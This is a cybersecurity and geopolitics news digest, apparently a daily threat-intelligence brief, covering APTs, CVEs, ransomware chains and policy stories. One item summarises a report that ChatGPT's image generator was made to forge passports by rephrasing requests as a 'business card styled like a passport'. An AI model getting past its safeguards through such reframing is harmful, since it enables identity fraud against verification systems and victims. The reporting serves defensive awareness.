Tuesday, Apr 15, 2025 // (IG): BB // GITHUB // SN R&D
Unverified Claims Surround Alleged U.S. Cyber Activities During Asian Winter Games
NOTE:
China’s recent decision to publicly name alleged U.S. NSA operatives and issue wanted notices over cyberattacks during the Asian Winter Games reflects more than just a tit-for-tat maneuver—it’s a striking example of imitation as the highest form of flattery. For years, the U.S. has led the charge in leveraging indictments as instruments of geopolitical signaling, unsealing charges against foreign hackers to name, shame, and isolate adversaries on the global stage. Now, Beijing is echoing that strategy almost to the letter, minus detailed accusations, technical claims, and high-profile targets. By attempting to replicate a democratic processes, China isn’t just retaliating—it’s acknowledging, perhaps inadvertently, the effectiveness of the American playbook.
Bottom Line Up Front (BLUF): China has accused the U.S. National Security Agency (NSA) of conducting cyberattacks during the 2025 Asian Winter Games in Harbin, naming three individuals as operatives. While China has published wanted notices for these individuals and outlined technical attack methods, no independent evidence or confirmation has been provided to verify the identities, affiliations, or technical claims.
Analyst Comments: The Chinese government is ramping up pressure in the ongoing cyber conflict narrative with the U.S. by naming alleged foreign operatives and detailing methods such as exploiting Microsoft Windows backdoors. However, without forensic data, logs, or malware samples released publicly, these claims cannot be verified by the international cybersecurity community. The allegations may serve diplomatic and political functions more than evidentiary ones. This trend of attributing specific actors without third-party validation highlights growing cyber-sovereignty posturing and strategic signaling between great powers.
FROM THE MEDIA: The Chinese Foreign Ministry and Harbin’s Public Security Bureau publicly accused three U.S. citizens of orchestrating cyberattacks under the NSA’s “Tailored Access Operations (TAO) unit”. These individuals were named in official wanted notices, which offered monetary rewards for information. Chinese cybersecurity agency CVERC claims the attacks targeted critical infrastructure in Heilongjiang Province during the 9th Asian Winter Games and exploited alleged pre-installed backdoors in Windows systems. China also implicated the University of California and Virginia Tech but did not clarify how they were involved. As of now, no U.S. government or university has responded, and no independent cybersecurity firms have corroborated the technical claims or the individuals’ affiliations.
READ THE STORY: Reuters // Global Times
India’s Opportunity in Trump’s Tariffs Lies in Low-End Manufacturing, Not Tech Glory
Bottom Line Up Front (BLUF): With U.S. tariffs now hitting Chinese exports at 125%, India finds itself in a rare position to absorb supply chains—especially in low-end manufacturing. While high-tech sectors like semiconductors and smartphones remain exempt (for now), smaller, easily relocatable industries such as household goods, appliances, and toys are ripe for transition. India should act decisively to attract foreign firms priced out of China, offering incentives and clear relocation pathways.
Analyst Comments: Trump’s aggressive tariff policies—particularly against China—present India with a time-sensitive window to attract manufacturers seeking alternatives. However, focusing on complex industries like chips or smartphones may overestimate India’s short-term capabilities. Instead, targeting “footloose” sectors with simpler supply chains offers a faster win. India’s scale, workforce, and maturing infrastructure give it a compelling value proposition, but it must act fast to compete with Vietnam and others already ahead in the relocation race. Proactive policy—such as SEZ incentives, relocation subsidies, and fast-track approvals—could be the difference between seizing and squandering this geopolitical tailwind.
FROM THE MEDIA: While smartphones and semiconductors are largely excluded from the 125% reciprocal tariff, simpler goods like vacuum flasks, toys, and festive decorations face steep new barriers into the U.S. from China. These industries, often comprised of smaller factories, are already looking to move due to rising costs in China. India, Harding suggests, should aggressively court these businesses with tours, subsidies, and policy clarity to ensure they pick Indian soil over Southeast Asia. Meanwhile, India must also contend with internal economic headwinds—particularly the Reserve Bank of India’s crackdown on unsecured consumer credit, which has slowed growth despite relatively modest household debt levels. In the broader picture, India’s economy is still on track to surpass Japan’s GDP by 2026, according to IMF forecasts.
READ THE STORY: FT
Chinese APTs Exploit Endpoint Blind Spots to Breach U.S. Infrastructure, Experts Warn
Bottom Line Up Front (BLUF): Chinese state-backed advanced persistent threat (APT) groups are increasingly exploiting visibility gaps in Endpoint Detection and Response (EDR) systems to infiltrate critical U.S. infrastructure. These attackers focus on under-monitored assets like firewalls, IoT devices, and cloud services, using stealthy tactics that evade traditional security tools. Experts urge organizations to modernize defenses with AI, threat hunting, and comprehensive network visibility strategies to close these gaps.
Analyst Comments: The revelation that Chinese APT groups such as Volt Typhoon and Salt Typhoon are actively leveraging EDR blind spots reflects a significant evolution in state-sponsored cyber-espionage strategy. Instead of focusing solely on endpoints, these actors are targeting edge infrastructure, legacy devices, and “smart” systems that often fall outside traditional monitoring scopes. The reported confirmation from Chinese officials that these attacks are retaliatory responses to U.S. Taiwan policy further underscores the geopolitical motivation behind this cyber activity. As AI-enhanced cyber operations become more prevalent, enterprises must integrate identity, network, and behavioral telemetry to detect lateral movement across hybrid environments—especially in sectors like utilities, telecom, and defense.
FROM THE MEDIA: These groups are reportedly focusing on edge devices, IoT systems, and other under-monitored assets to carry out long-term, undetected cyber-espionage campaigns. During Google Cloud Next 2025, Sandra Joyce of Google Threat Intelligence described China as a rising “cyber superpower,” leveraging this gap to infiltrate critical U.S. infrastructure. According to Armis Labs, 79% of U.S. IT decision-makers now identify China as the top cyber threat. Experts like Aaron Shelmire of Abstract Security and Andrew Grealy of Armis Labs recommend combining EDR with identity access controls, anomaly detection, AI, and threat hunting. They warn that failing to modernize security strategies will leave organizations vulnerable to increasingly sophisticated and stealthy intrusions backed by nation-state capabilities.
READ THE STORY: DR
CVE-2024-49421: Samsung Galaxy S24 Quick Share Flaw Enables Unauthorized File Creation
Bottom Line Up Front (BLUF): A directory traversal vulnerability in Samsung’s Quick Share app (CVE-2024-49421) affects Galaxy S24 devices, allowing nearby attackers to write arbitrary files to user-accessible directories. Discovered by NCC Group and disclosed through ZDI, the flaw has been patched in Samsung’s December 2024 Security Maintenance Release, but unpatched devices remain at risk of data manipulation or privilege escalation.
Analyst Comments: While CVE-2024-49421 carries a medium CVSS score (5.9), its potential impact on user data integrity and security is notable, particularly given Quick Share’s widespread deployment on millions of Galaxy S24 devices. Although the exploit requires local network access and some user interaction, its use in combination with phishing or malware could enable lateral movement or system tampering. The vulnerability underscores the importance of enforcing secure input validation and maintaining rigorous update hygiene, especially for pre-installed mobile applications that often operate with elevated privileges. Enterprises with BYOD policies should ensure mobile device updates are enforced and file-sharing features are monitored or restricted.
FROM THE MEDIA: The flaw was discovered by Ken Gannon of NCC Group and allows attackers with network proximity to create arbitrary files on a target device by manipulating file paths. The vulnerability stems from insufficient validation of user-supplied paths in Quick Share, which enables writing files outside intended directories. Samsung issued a fix in its December 2024 Security Maintenance Release, but the flaw remained under coordinated disclosure until April 2025. Samsung urged users to apply the update and enable auto-update settings. While no active exploitation has been confirmed, experts warn that delayed patching could expose devices to data tampering, privilege escalation, or ransomware deployment.
READ THE STORY: GBhackers
ResolverRAT Targets Global Healthcare and Pharma Sectors via Sophisticated Phishing Campaign
Bottom Line Up Front (BLUF): A new remote access trojan dubbed ResolverRAT has been discovered targeting the healthcare and pharmaceutical industries through region-specific phishing campaigns and DLL side-loading. According to Morphisec Labs, the malware leverages multi-stage, in-memory execution and advanced evasion techniques to maintain stealthy, persistent access to infected systems.
Analyst Comments: ResolverRAT demonstrates how modern cybercrime groups are blending traditional tactics—like phishing—with advanced stealth techniques to compromise high-value industries. The use of localized lures and in-memory payload delivery reflects a professional, multinational operation, possibly operated by a cybercrime-as-a-service (CaaS) affiliate network. While attribution remains unclear, the infrastructure overlap with known stealer campaigns (e.g., Lumma, Rhadamanthys) suggests shared toolkits or operational collaboration. Given the malware’s stealth, fallback mechanisms, and use of certificate-based C2 communication, organizations in healthcare and pharma should immediately audit systems for signs of lateral movement, registry abuse, and unusual encrypted traffic.
FROM THE MEDIA: Researchers at Morphisec Labs uncovered a new RAT known as ResolverRAT, which has been targeting organizations in the healthcare and pharmaceutical sectors. The attack campaign, observed as recently as March 10, uses phishing emails written in localized languages including Hindi, Turkish, Italian, Portuguese, and others to maximize infection rates globally. These emails rely on urgency-based themes such as legal action or copyright violations to coax users into downloading a malicious file, which initiates the execution chain through DLL side-loading. The malware is deployed via a decrypted in-memory loader and never touches the disk, complicating detection.
READ THE STORY: THN
EU Explores Legal Path to Exit Russian Gas Contracts Without Paying Penalties
Bottom Line Up Front (BLUF): The European Commission is examining legal options—including invoking force majeure—to allow energy companies to exit long-term gas contracts with Russia without paying termination fees. The move is part of a broader effort to eliminate Russian fossil fuel imports by 2027 and cut revenue streams funding Moscow’s war in Ukraine. However, legal, political, and economic complexities threaten to stall the plan.
Analyst Comments: Brussels’ latest effort reflects the EU’s enduring dilemma: maintaining energy security while sanctioning Russia’s war economy. While pipeline gas imports have sharply declined since 2022, Russian LNG imports have surged, revealing the limitations of voluntary divestment. The idea of invoking force majeure is legally fraught, especially with varied, confidential contract terms and the lack of a unified legal standard across EU jurisdictions. Political pushback from Russia-leaning member states like Hungary and Slovakia further complicates matters. In parallel, the EU’s consideration of gas-related concessions in U.S. trade negotiations underscores how energy policy is increasingly shaped by geopolitical leverage rather than economic logic.
FROM THE MEDIA: The European Commission is analyzing existing long-term gas contracts between EU firms and Russian suppliers to determine if force majeure or other legal tools can justify breaking the agreements without compensating Moscow. The goal is to cut Russian gas out of the EU energy mix entirely by 2027. Despite steep declines in pipeline gas imports—down from nearly 40% in 2022 to 11% today—Russian LNG deliveries have grown by 60% in the past three years. The EU still paid nearly €22 billion to Russia for energy between February 2024 and 2025. Legal complexity, confidential contracts, and pushback from Hungary and Slovakia have delayed a formal road map on phasing out Russian gas. As an alternative, think tanks such as Bruegel have proposed EU-wide tariffs, which would require only a qualified majority vote rather than unanimity. Meanwhile, the U.S. has emerged as the EU’s top LNG supplier, with gas imports increasingly factoring into trade talks with the Trump administration.
READ THE STORY: FT
ChatGPT Image Generator Abused to Forge Fake Passports, Says 2025 Cato CTRL Report
Bottom Line Up Front (BLUF): The 2025 Cato CTRL Threat Report has revealed that OpenAI’s ChatGPT image generator is being exploited to create highly realistic fake passports, enabling low-skill cybercriminals to bypass traditional identity verification systems. This marks a significant escalation in document-based fraud, highlighting the urgent need for advanced verification technologies beyond static photo ID checks.
Analyst Comments: The abuse of generative AI tools like ChatGPT for producing fake identification documents illustrates how the democratization of AI can empower a new class of "zero-knowledge" threat actors—individuals with little to no technical expertise but significant intent to defraud. This development poses a substantial challenge for financial services, healthcare, and legal sectors, which increasingly rely on digital KYC (Know Your Customer) processes. The ability to manipulate AI safeguards through prompt engineering demonstrates how generative models can be subverted, raising critical concerns for model alignment and content moderation. Identity verification systems must now evolve beyond surface-level checks and incorporate liveness detection, NFC document scanning, and hardware-based security anchors.
FROM THE MEDIA: By rephrasing prompt requests—such as asking the AI to design a "business card styled like a passport"—threat actors are bypassing built-in restrictions and producing visually convincing forgeries. These AI-generated documents feature realistic overlays, stamp placements, and design elements that require no technical knowledge or access to black-market resources. This accessibility has enabled a wave of fraud involving fake identities, including new account creation, account takeover, insurance and medical fraud, and legal document manipulation. The report emphasizes that standard methods of identity verification are now insufficient against such tactics, urging industries to adopt more secure alternatives like NFC chip validation, biometric liveness checks, and tamper-proof digital IDs. The rise of AI-fueled identity fraud signals a critical inflection point in the cybercrime landscape, with far-reaching implications for regulatory compliance, fraud detection, and digital trust.
READ THE STORY: GBhackers
Chinese Authorities Intensify Digital Surveillance in Tibet, Arrest Dozens Over Phone and Internet Use
Bottom Line Up Front (BLUF): According to Human Rights Watch, over 60 Tibetans have been arrested in China since 2021 for phone and internet-related activity, including social media use and possession of unauthorized religious content. The arrests are part of an intensifying surveillance regime in Tibetan regions, where police routinely search phones, monitor online platforms, and enforce bans on unapproved digital content.
Analyst Comments: China’s strategy of digital repression in Tibet closely mirrors its policies in Xinjiang, relying on a combination of mass phone surveillance, data-harvesting apps, and vague legal justifications to detain individuals. These measures are not only designed to suppress dissent but to eliminate cultural and religious expressions that counter official narratives. The reported use of spyware-like fraud prevention apps raises new concerns about state-sponsored mobile surveillance capabilities, including persistent access to sensitive data and device control. This approach reflects a broader blueprint for authoritarian digital control that may be exported or adopted in other regions facing similar political dissent.
FROM THE MEDIA: Offenses include sharing unauthorized religious content, promoting the Tibetan language, creating unapproved social media groups, and communicating with people outside the country. Many of these arrests stem from possession of materials linked to Buddhist leaders, or criticism of Mandarin language requirements in schools. The crackdown intensified following mass phone searches and “political education” detentions that began in 2021. Researchers noted that Chinese authorities especially monitor digital activity around protests, such as those in Sichuan against dam construction in 2024. A government-mandated app, allegedly for fraud prevention, has been used to conduct surveillance, allowing deep access to mobile devices. Human rights groups have drawn parallels between these practices and China’s treatment of Uyghurs in Xinjiang. The report follows renewed international concern after the death in Chinese custody of a prominent Tibetan monk who fled to Vietnam in 2024.
READ THE STORY: The Record
North Korean Group ‘Slow Pisces’ Targets Crypto Developers with Stealthy Python Malware
Bottom Line Up Front (BLUF): A DPRK linked threat actor, Slow Pisces (aka Jade Sleet/TraderTraitor), is using fake job offers to deliver malware disguised as coding challenges to cryptocurrency developers. The campaign, analyzed by Palo Alto Networks' Unit 42, involves delivering trojanized Python and JavaScript projects via GitHub, leading to the deployment of an infostealer malware known as RN Stealer, primarily targeting macOS systems.
Analyst Comments: A highly targeted social engineering combined with platform abuse (e.g., GitHub, LinkedIn) to reach technical users in the cryptocurrency space. Unlike wide phishing attacks, this approach allows adversaries to tightly control delivery and tailor payloads to high-value victims. The use of YAML and EJS for code execution reflects efforts to evade traditional detection mechanisms. As North Korean APTs evolve operational security, defenders should monitor not just payloads, but also developer interaction points such as hiring platforms and open-source repositories.
FROM THE MEDIA: The attackers targeted cryptocurrency developers via LinkedIn by posing as employers and sharing coding challenges containing malware. Victims were tricked into downloading GitHub-hosted Python or JavaScript projects, which stealthily delivered malware in stages. Unit 42 identified two primary tools: RN Loader (initial reconnaissance and payload retrieval) and RN Stealer (a macOS infostealer targeting sensitive files like SSH keys, iCloud Keychain data, and cloud config files). The attackers use evasive tactics such as YAML deserialization and dynamic payload delivery based on IP, geolocation, and request headers. Unlike other North Korean operations, Slow Pisces exercises tight operational control, delivering second-stage payloads only when specific victim criteria are met.
READ THE STORY: THN
Taiwan Charges Chinese Ship Captain in Undersea Cable Sabotage Case Amid Rising Tensions
Bottom Line Up Front (BLUF): Taiwanese authorities have formally charged the Chinese captain of the Hong Tai 58, a Togo-flagged cargo ship, for damaging a subsea telecommunications cable between Taiwan and the Penghu Islands. The charge follows growing concerns over cable disruptions in the region, which Taipei officials have linked to possible acts of Chinese hybrid warfare.
Analyst Comments: This is the first time Taiwan has brought formal legal action in response to the repeated disruption of its critical undersea infrastructure, signaling a shift from diplomatic caution to direct confrontation. While no direct link to Chinese state directives has been established, the incident mirrors suspected sabotage operations in other geopolitically sensitive regions, such as the Baltic Sea. It also coincides with heightened cyber and military activity from Beijing, suggesting a potential multi-domain campaign aimed at destabilizing Taiwan’s communications and asserting strategic pressure ahead of possible escalations in the Taiwan Strait.
FROM THE MEDIA: Taiwan, charged the Chinese captain of the Hong Tai 58 with intentionally damaging a subsea cable connecting Taiwan to the Penghu Islands. The incident occurred in February 2025 when the vessel allegedly dropped and dragged its anchor, severing a critical telecommunications link. While Taiwan has experienced nearly a dozen similar incidents in recent years, this marks the first time charges have been filed. Authorities noted that the captain, identified only by the surname Wang, showed a “bad attitude” and refused to reveal ownership details of the vessel. The other seven crew members—all Chinese nationals—were not charged and are set to be deported. The Taiwanese government has long warned of hybrid warfare tactics by China, including cyberattacks and covert influence operations, and officials have raised concerns that these cable incidents may form part of a larger strategic campaign.
READ THE STORY: The Record
State-Backed Hackers Target Maritime Tech in Espionage Campaigns, Norma Cyber Warns
Bottom Line Up Front (BLUF): A new 2025 threat assessment by Norway's Norma Cyber has identified state-sponsored cyber espionage as a major threat to the maritime technology sector. The report warns that hacker groups linked to Russia, China, and India are actively targeting ship technology firms to acquire advanced systems for military and economic use—focusing on navigation, communication, robotics, and autonomous vessel technologies.
Analyst Comments: This warning signals a widening front in global cyber-espionage campaigns, where strategic sectors like shipping—once overlooked—are becoming high-value targets. The push toward autonomous and green shipping technology has drawn attention from adversarial states seeking both military advantages and civilian innovation. Russian actors, especially Fancy Bear, appear to be shifting from tactical military disruptions to strategic tech theft, while China continues its long-term intelligence-gathering strategy via groups like Mustang Panda. As maritime digitalization accelerates, security must evolve beyond vessel-level protections to include shore-based infrastructure and supply chain systems.
FROM THE MEDIA: Norma Cyber, a Norwegian cyber resilience center backed by the Norwegian Shipowners’ Association and DNK, released a report warning that the maritime technology sector is facing an escalating threat from state-backed hackers. The report identifies Russian group Fancy Bear and Chinese group Mustang Panda as active espionage actors targeting navigation, communication, and robotic systems used in shipping. The actors typically infiltrate corporate infrastructure rather than the ships themselves, aiming to exfiltrate data from shore-based R&D and operations networks. Russia, cut off from Western military tech due to sanctions, is reportedly using cyber means to bypass traditional supply chains. Chinese hackers have focused on underwater and autonomous vessel tech, deploying malware via infected USBs to maintain stealthy access. Norma’s CTO stressed that cybersecurity must keep pace with the industry's rapid digital transformation.
READ THE STORY: Trade Winds
DOGE 'Big Balls' Ransomware Leverages LNK Shortcuts, BYOVD, and Psychological Warfare in Sophisticated Campaign
Bottom Line Up Front (BLUF): A newly identified ransomware strain known as DOGE "Big Balls" is actively exploiting ZIP-based LNK shortcuts and Bring Your Own Vulnerable Driver (BYOVD) techniques to deliver stealthy, targeted attacks. The campaign, which employs psychological tactics and advanced anti-analysis features, uses an old Intel driver vulnerability (CVE-2015-2291) to escalate privileges and deploy ransomware with geolocation targeting and post-encryption capabilities.
Analyst Comments: DOGE Big Balls represents a disturbing evolution in ransomware tactics by blending technical exploitation, such as kernel-level privilege escalation through BYOVD, with social engineering aimed at psychological intimidation. The use of LNK shortcuts inside ZIP files—masquerading as financial documents—ensures a high initial click-through rate. Meanwhile, the inclusion of targeted geolocation via the Wigle.net API and name-dropping of real individuals in the ransom note points to a highly personalized and potentially reputation-damaging strategy. The embedded Havoc C2 beacon suggests this ransomware may also serve dual purposes: encryption for extortion and persistent access for espionage or secondary exploitation.
FROM THE MEDIA: The DOGE Big Balls ransomware campaign begins with a ZIP archive, often themed around finance-related topics like “Pay Adjustment.zip.” Inside is an LNK file disguised as a document, which executes PowerShell commands when clicked. These commands determine if the user has admin privileges and accordingly deploy either a disguised ransomware payload (“Adobe Acrobat.exe”) or install persistence in a user-specific startup directory. The attack incorporates a kernel exploit tool, ktool.exe, that abuses CVE-2015-2291, a vulnerability in an Intel driver, to disable logging and evade security controls. The ransomware collects system and network data—including BSSID-based geolocation using the Wigle.net API—before encrypting files and appending a “.flocked” extension. It drops ransom notes demanding Monero and referencing real names, possibly to mislead or intimidate victims. Additionally, the malware plants a Havoc C2 beacon, indicating the potential for long-term control or exfiltration. Anti-analysis tactics such as environment checks, obfuscated PowerShell scripts, and deletion of shadow copies are used throughout the attack chain.
READ THE STORY: GBhackers
Enterprise Browser Extensions Pose Critical Data Security Risk, LayerX Report Warns
Bottom Line Up Front (BLUF): LayerX's Enterprise Browser Extension Security Report 2025 has revealed that browser extensions pose a significant and often underestimated risk to corporate cybersecurity. With 99% of enterprise users relying on browser extensions—more than half of which can access sensitive data such as cookies, credentials, and internal web content—organizations face mounting threats from unvetted, outdated, or malicious third-party code embedded directly in their users’ browsers.
Analyst Comments: Browser extensions have become the new shadow IT: ubiquitous, minimally governed, and capable of accessing highly sensitive data. The LayerX report confirms what many security teams have suspected—extensions are an exploitable weak point in the enterprise software stack. The threat is amplified by the rise of GenAI productivity tools, which often require intrusive permissions to function. Moreover, the lack of transparency in publisher identities and widespread use of sideloaded or abandoned extensions increases the likelihood of supply chain compromise or latent exploitation. Organizations must incorporate browser extension telemetry into their broader attack surface management strategy and adopt continuous monitoring frameworks that extend to browser-layer activity.
FROM THE MEDIA: A new report from LayerX, the Enterprise Browser Extension Security Report 2025, reveals that browser extensions pose a major but often overlooked cybersecurity risk in enterprise environments. The report found that 99% of employees use extensions—over half of which can access sensitive data such as cookies, credentials, and internal web content. Many of these extensions are published by anonymous developers, with 54% registered using only Gmail accounts and 79% releasing just one extension. Additionally, 51% of extensions haven’t been updated in over a year, and 26% are sideloaded, bypassing security reviews. GenAI tools add further risk, with 20% of users having at least one installed and 58% of those carrying high-risk permissions. LayerX urges organizations to audit, categorize, and assess extension risks, and to implement adaptive, policy-based enforcement to reduce exposure from this growing threat vector.
READ THE STORY: THN
Trump FCC Chief Pressures Europe to Choose Starlink Over Chinese Tech Amid Global Telecom Divide
Bottom Line Up Front (BLUF): Brendan Carr, the newly reappointed Federal Communications Commission (FCC) chair under President Donald Trump, has warned European allies to align with U.S. technology—specifically Starlink—over Chinese communications infrastructure. As Europe weighs options for satellite broadband expansion, Carr urged EU nations to choose sides in what he framed as a growing technological divide between the U.S. and the Chinese Communist Party (CCP).
Analyst Comments: Carr's comments signal a clear intensification of U.S. pressure on allies to adopt American communications infrastructure and resist China’s influence in satellite and AI ecosystems. This messaging coincides with broader Trump-era policies that pair trade tariffs with strategic industrial alignment. European regulators, wary of Starlink’s unpredictability—especially after Washington threatened to disable service in Ukraine—face difficult trade-offs between autonomy, security, and cost. Carr’s public callout of EU “bias” and protectionism may deepen transatlantic tensions at a time when cooperation is critical for coordinating on AI governance, 5G/6G standards, and cybersecurity. The U.S. offer of faster regulatory clearance for Nokia and Ericsson if they shift more operations stateside also highlights Washington’s intent to realign the global telecom supply chain around U.S. soil.
FROM THE MEDIA: FCC chair Brendan Carr called on Europe to decisively choose between U.S. and Chinese telecom and satellite infrastructure, advocating for Elon Musk’s Starlink as the preferred provider. Starlink, owned by Musk’s SpaceX, has been trialed by UK firms like BT and Virgin Media O2 but remains under scrutiny after U.S. officials previously threatened to cut service to Ukraine. Carr, a staunch ally of Musk, accused the European Commission of holding an “anti-American” regulatory bias and described the EU’s hesitance as a sign of being “caught” between geopolitical camps. He warned of a widening “great divide” in global communications technology. While Europe is developing its own satellite capabilities, industry analysts note that no single EU-based system currently matches Starlink’s capacity or coverage. Meanwhile, Carr encouraged Ericsson and Nokia to relocate more of their manufacturing to the U.S. to avoid Trump’s looming tariff regime and suggested expedited regulatory support in return. The comments arrive amid surging interest in securing Europe’s military and civilian satellite networks as transatlantic telecom rivalry deepens.
READ THE STORY: FT
Critical RCE Vulnerability in Gladinet CentreStack and Triofox Exploited in Active Attacks
Bottom Line Up Front (BLUF): A critical remote code execution (RCE) vulnerability tracked as CVE-2025-30406 is actively being exploited in the wild, affecting both Gladinet CentreStack and Triofox products. The flaw, stemming from a hardcoded cryptographic key, has already been used to compromise at least seven organizations, enabling attackers to execute arbitrary code and gain persistent remote access.
Analyst Comments: The exploitation of CVE-2025-30406 follows a worrying trend where zero-day vulnerabilities in remote access tools are used for deep infiltration into networks. The post-exploitation activity, including DLL sideloading, use of encoded PowerShell scripts, and lateral movement via MeshCentral and Impacket tools, demonstrates a high level of attacker sophistication. Organizations using CentreStack or Triofox should immediately upgrade to patched versions and audit historical activity dating back to early April for signs of compromise.
FROM THE MEDIA: Huntress researchers disclosed that the remote code execution vulnerability CVE-2025-30406, originally found in Gladinet’s CentreStack, also affects its Triofox product. The flaw arises from the presence of a hardcoded cryptographic key, which attackers can exploit to execute code remotely on exposed systems. While a patch for CentreStack (v16.4.10315.56368) was issued on April 3, Triofox remains vulnerable up to version 16.4.10317.56372. Huntress observed successful exploitation in at least seven organizations, with initial compromise activity traced back to April 11. Attackers leveraged the vulnerability to download and sideload malicious DLLs via encoded PowerShell scripts, similar to tactics seen in other recent exploits like the CrushFTP attacks. Further activity included installing MeshCentral for persistence, running Impacket for system enumeration, and deploying MeshAgent.
READ THE STORY: THN
Items of interest
Trump Defies Supreme Court, Escalates Authoritarian Governance in Deportation Standoff
Bottom Line Up Front (BLUF): President Donald Trump openly defied a unanimous U.S. Supreme Court ruling by refusing to repatriate Kilmar Armando Abrego Garcia, an individual wrongfully deported under his administration. Trump falsely claimed the Court ruled in his favor, a stance echoed by key members of his cabinet and El Salvador’s President Nayib Bukele, where Garcia is currently being held. The move has ignited concerns over the erosion of U.S. constitutional norms, judicial independence, and civil liberties.
Analyst Comments: By rejecting a 9-0 Supreme Court decision, Trump has asserted executive supremacy over the judiciary—a move that legal experts argue dismantles constitutional governance. The administration’s embrace of foreign authoritarian models, exemplified by the alignment with Bukele and the opaque prison contracts in El Salvador, reflects a shift toward extrajudicial rule. The implications are profound, not just for deportees, but for all citizens, as traditional legal protections around due process, habeas corpus, and administrative oversight are increasingly bypassed or undermined.
FROM THE MEDIA: Trump’s refusal to comply with the Supreme Court ruling on Garcia’s repatriation marks the first known instance of a U.S. president disregarding a unanimous high court decision in modern history. Garcia, deported under dubious national security claims, was confirmed not to be a threat by a government attorney who has since been suspended. Trump, alongside El Salvador’s President Bukele, declared Garcia a terrorist without evidence and refused to repatriate him, violating the court’s order. This follows a pattern of behavior including the persecution of critics like former CISA director Chris Krebs, aggressive media targeting, and the weaponization of regulatory bodies such as the FCC. Experts and human rights organizations warn that the U.S. government under Trump is now flirting with authoritarianism, where executive power supersedes judicial mandates and dissent is met with punitive retaliation.
READ THE STORY: FT
El Salvador's "Dictator" Key to Disappearing Migrants Like Kilmar Abrego Garcia (Video)
FROM THE MEDIA: Salvadoran President Nayib Bukele is meeting with President Donald Trump at the White House on Monday, part of a growing alliance between the two right-wing leaders. In recent months, El Salvador has imprisoned hundreds of people for the Trump administration who were expelled from the United States with little or no due process, ending up in the brutal mega-prison known as CECOT.
Inside El Salvador prison housing deported US migrants (Video)
FROM THE MEDIA: ABC News goes inside Cecot, the notorious El Salvadoran mega-prison where the Trump administration has deported hundreds of alleged gang members.
The selected stories cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not endorse any third-party claims made in its original material or related links on its sites; the opinions expressed by third parties are theirs alone. For further questions, please contact InfoDom Securities at dominanceinformation@gmail.com.